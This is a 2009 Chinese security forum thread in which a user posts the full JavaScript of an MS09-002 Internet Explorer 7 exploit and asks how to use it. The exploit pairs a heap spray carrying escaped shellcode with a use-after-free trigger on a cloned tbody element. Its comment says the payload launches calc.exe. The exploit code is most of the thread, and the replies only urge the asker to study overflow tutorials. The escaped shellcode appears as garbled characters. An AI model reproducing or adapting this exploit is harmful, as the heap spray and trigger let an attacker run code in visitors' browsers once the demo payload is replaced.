首页
社区
课程
招聘
[旧帖] [求助]MS09-002利用 0.00雪花
发表于: 2009-2-22 11:29 4619

[旧帖] [求助]MS09-002利用 0.00雪花

2009-2-22 11:29
4619
最近的MS09-002爆发...代码在网上传的都像原来的135那样了....
但是我看不懂也...问好怎么利用这代码..好像是脚本吧?

是不是要ODAY那本书里面的那个傻瓜化的MSF那个网页工具哦?
<script language="JavaScript">
<!--
MS09-002 Internet Exploere 7.0 Exploit
Modify by Friddy 2009.02.12 mail:qianyang@ssyeah.com
blog:www.friddy.cn
Tested under Windows XP sp2+IE 7.0
shellcode will popup the calc.exe
-->
var shellcode=unescape("%uE8FCD䖋謼ռŸ误ᡏ律Ġ䧫㒋Ƌ㇮駀蒬瓀섇්숁吻Ф律Ĥ曫ಋ譋ᱟ᲋Ƌ觫⑜쌄쀱譤぀삅౸䂋謌ᱰ训ࡨ৫肋°梋弼噠삃偻繨桳ﺘຊw揧污c");

var array = new Array();

var ls = 0x100000-(shellcode.length*2+0x01020);

var b = unescape("഍഍");
while(b.length<ls) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;

for(i=0; i<0xD0; i++) {
    array[i] = lh + shellcode;
}

CollectGarbage();

var s1=unescape("ଋଋAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();   
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
</script>

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 1
支持
分享
最新回复 (3)
雪    币: 6092
活跃值: (744)
能力值: ( LV4,RANK:45 )
在线值:
发帖
回帖
粉丝
2
去看溢出教程,自学SHELLCODE。其他都是外在的,基础就在溢出教程
2009-2-22 11:41
0
雪    币: 220
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
哪里有溢出教程哦?你是说那本书里面么...我买了ODAY那本书的!
2009-2-22 12:07
0
雪    币: 6092
活跃值: (744)
能力值: ( LV4,RANK:45 )
在线值:
发帖
回帖
粉丝
4
只要你肯学,什么书都是带你上天的书,只要你肯做,什么事都可以让你获得重生。
你的态度决定你的命运。无论你是否有疾患,无论你曾经多么不幸,世界很公平,关了幸运的大门就是让你找到其他的门。所以你去看,看一切你不明白的,看到明白为止,看你不懂的,看懂为止。
2009-2-22 13:26
0
游客
登录 | 注册 方可回帖
返回
//